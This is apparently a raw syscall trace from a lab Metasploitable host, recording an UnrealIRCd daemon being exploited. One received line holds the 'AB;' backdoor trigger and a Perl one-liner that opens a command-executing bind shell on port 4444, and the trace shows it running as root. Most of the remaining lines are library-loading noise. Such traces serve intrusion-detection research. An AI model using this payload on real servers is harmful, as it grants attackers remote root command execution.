4519  07:22:07.648425 select(1024, [2 3 4 7 9], [], NULL, {0, 600000}) = 1 (in [2], left {0, 410000})

4519  07:22:07.840401 clock_gettime(CLOCK_MONOTONIC, {1737, 657427110}) = 0

4519  07:22:07.840432 accept(2, 0, NULL) = 5

4519  07:22:07.840457 getpeername(5, {sa_family=AF_INET, sin_port=htons(38811), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:22:07.840501 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:22:07.840519 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:22:07.840539 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:22:07.840559 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:22:07.840577 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:22:07.840595 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:22:07.840753 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:22:07.840792 clock_gettime(CLOCK_MONOTONIC, {1737, 657809678}) = 0

4519  07:22:07.840811 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:22:07.840829 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:22:07.840843 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:22:07.840857 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:22:07.840872 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:22:07.840896 send(6, "\366\214\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:22:07.841000 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:22:07.841045 gettimeofday({1495624927, 841052}, NULL) = 0

4519  07:22:07.841063 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:22:07.848727 clock_gettime(CLOCK_MONOTONIC, {1737, 665747696}) = 0

4519  07:22:07.848748 recvfrom(6, "\366\214\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0(\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:22:07.848790 close(6)          = 0

4519  07:22:07.848807 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:22:07.848822 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:22:07.848845 time(NULL)        = 1495624927

4519  07:22:07.848869 time(NULL)        = 1495624927

4519  07:22:07.848881 gettimeofday({1495624927, 848885}, NULL) = 0

4519  07:22:07.848893 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:22:07.848923 clock_gettime(CLOCK_MONOTONIC, {1737, 665935772}) = 0

4519  07:22:07.848933 gettimeofday({1495624927, 848937}, NULL) = 0

4519  07:22:07.848944 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 0 (Timeout)

4519  07:22:08.845855 clock_gettime(CLOCK_MONOTONIC, {1738, 662864339}) = 0

4519  07:22:08.845855 gettimeofday({1495624928, 845856}, NULL) = 0

4519  07:22:08.845856 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:22:08.845856 clock_gettime(CLOCK_MONOTONIC, {1738, 662865055}) = 0

4519  07:22:08.845856 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:22:08.845883 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:22:08.845906 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:22:08.845918 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:22:08.845934 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 8159

8159  07:22:08.846003 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

8159  07:22:08.846018 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

8159  07:22:08.846029 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8159  07:22:08.846052 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

8159  07:22:08.846209 brk(0)            = 0x80f9000

8159  07:22:08.846232 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8159  07:22:08.846249 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f15000

8159  07:22:08.846265 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

8159  07:22:08.846283 open("/etc/ld.so.cache", O_RDONLY) = 1

8159  07:22:08.846297 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

8159  07:22:08.846316 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0d000

8159  07:22:08.846326 close(1)          = 0

8159  07:22:08.846337 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8159  07:22:08.846352 open("/lib/libncurses.so.5", O_RDONLY) = 1

8159  07:22:08.846365 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

8159  07:22:08.846461 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

8159  07:22:08.846479 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7edd000

8159  07:22:08.846491 mmap2(0xb7f0a000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f0a000

8159  07:22:08.846508 close(1)          = 0

8159  07:22:08.846520 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8159  07:22:08.846534 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

8159  07:22:08.846548 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

8159  07:22:08.846684 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

8159  07:22:08.846702 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ed9000

8159  07:22:08.846720 mmap2(0xb7edb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7edb000

8159  07:22:08.846737 close(1)          = 0

8159  07:22:08.846748 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8159  07:22:08.846762 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

8159  07:22:08.846776 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

8159  07:22:08.846866 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

8159  07:22:08.846883 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ed8000

8159  07:22:08.846897 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d89000

8159  07:22:08.846908 mmap2(0xb7ed2000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ed2000

8159  07:22:08.846922 mmap2(0xb7ed5000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ed5000

8159  07:22:08.846936 close(1)          = 0

8159  07:22:08.846959 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d88000

8159  07:22:08.846970 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d886b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

8159  07:22:08.847026 mprotect(0xb7ed2000, 4096, PROT_READ) = 0

8159  07:22:08.847063 munmap(0xb7f0d000, 29913) = 0

8159  07:22:08.847089 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8159  07:22:08.847111 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

8159  07:22:08.847154 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbe75a0) = -1 ENOTTY (Inappropriate ioctl for device)

8159  07:22:08.847199 brk(0)            = 0x80f9000

8159  07:22:08.847209 brk(0x80fa000)    = 0x80fa000

8159  07:22:08.847221 brk(0x80fb000)    = 0x80fb000

8159  07:22:08.847238 getuid32()        = 0

8159  07:22:08.847247 getgid32()        = 0

8159  07:22:08.847256 geteuid32()       = 0

8159  07:22:08.847265 getegid32()       = 0

8159  07:22:08.847279 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8159  07:22:08.847292 time(NULL)        = 1495624928

8159  07:22:08.847305 brk(0x80fc000)    = 0x80fc000

8159  07:22:08.847320 brk(0x80fd000)    = 0x80fd000

8159  07:22:08.847339 open("/proc/meminfo", O_RDONLY) = 1

8159  07:22:08.847360 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

8159  07:22:08.847379 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f14000

8159  07:22:08.847390 read(1, "MemTotal:      1035240 kB\nMemFree:        525900 kB\nBuffers:         65256 kB\nCached:         286684 kB\nSwapCached:          0 kB\nActive:         254752 kB\nInactive:       226152 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        525660 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4632 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52004 kB\nSlab:            17128 kB\nSReclaimable:     8864 kB\nSUnreclaim:       8264 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

8159  07:22:08.847479 close(1)          = 0

8159  07:22:08.847490 munmap(0xb7f14000, 4096) = 0

8159  07:22:08.847503 brk(0x80fe000)    = 0x80fe000

8159  07:22:08.847529 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

8159  07:22:08.847542 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

8159  07:22:08.847554 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

8159  07:22:08.847566 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

8159  07:22:08.847578 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

8159  07:22:08.847590 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

8159  07:22:08.847636 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8159  07:22:08.847650 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

8159  07:22:08.847678 uname({sys="Linux", node="metasploitable", ...}) = 0

8159  07:22:08.847726 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

8159  07:22:08.847744 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

8159  07:22:08.847763 brk(0x8100000)    = 0x8100000

8159  07:22:08.847775 getcwd("/etc/unreal", 4096) = 12

8159  07:22:08.847789 getpid()          = 8159

8159  07:22:08.847805 getppid()         = 4519

8159  07:22:08.847821 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

8159  07:22:08.847841 stat64("/sbin/sh", 0xbfbe7578) = -1 ENOENT (No such file or directory)

8159  07:22:08.847853 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

8159  07:22:08.847871 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

8159  07:22:08.847895 socket(PF_FILE, SOCK_STREAM, 0) = 1

8159  07:22:08.847908 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

8159  07:22:08.847920 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

8159  07:22:08.847942 close(1)          = 0

8159  07:22:08.847954 socket(PF_FILE, SOCK_STREAM, 0) = 1

8159  07:22:08.847964 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

8159  07:22:08.847974 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

8159  07:22:08.847992 close(1)          = 0

8159  07:22:08.848006 open("/etc/nsswitch.conf", O_RDONLY) = 1

8159  07:22:08.848020 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

8159  07:22:08.848037 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f14000

8159  07:22:08.848048 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

8159  07:22:08.848097 read(1, "", 4096) = 0

8159  07:22:08.848137 close(1)          = 0

8159  07:22:08.848147 munmap(0xb7f14000, 4096) = 0

8159  07:22:08.848177 open("/etc/ld.so.cache", O_RDONLY) = 1

8159  07:22:08.848190 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

8159  07:22:08.848207 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0d000

8159  07:22:08.848217 close(1)          = 0

8159  07:22:08.848228 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8159  07:22:08.848243 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

8159  07:22:08.848257 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

8159  07:22:08.848350 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

8159  07:22:08.848368 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7f000

8159  07:22:08.848381 mmap2(0xb7d86000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d86000

8159  07:22:08.848398 close(1)          = 0

8159  07:22:08.848410 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8159  07:22:08.848423 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

8159  07:22:08.848437 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

8159  07:22:08.848524 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

8159  07:22:08.848541 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d67000

8159  07:22:08.848553 mmap2(0xb7d7b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d7b000

8159  07:22:08.848568 mmap2(0xb7d7d000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d7d000

8159  07:22:08.848581 close(1)          = 0

8159  07:22:08.848634 munmap(0xb7f0d000, 29913) = 0

8159  07:22:08.848668 open("/etc/ld.so.cache", O_RDONLY) = 1

8159  07:22:08.848681 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

8159  07:22:08.848698 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0d000

8159  07:22:08.848709 close(1)          = 0

8159  07:22:08.848732 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8159  07:22:08.848747 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

8159  07:22:08.848761 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

8159  07:22:08.848855 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

8159  07:22:08.848872 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5d000

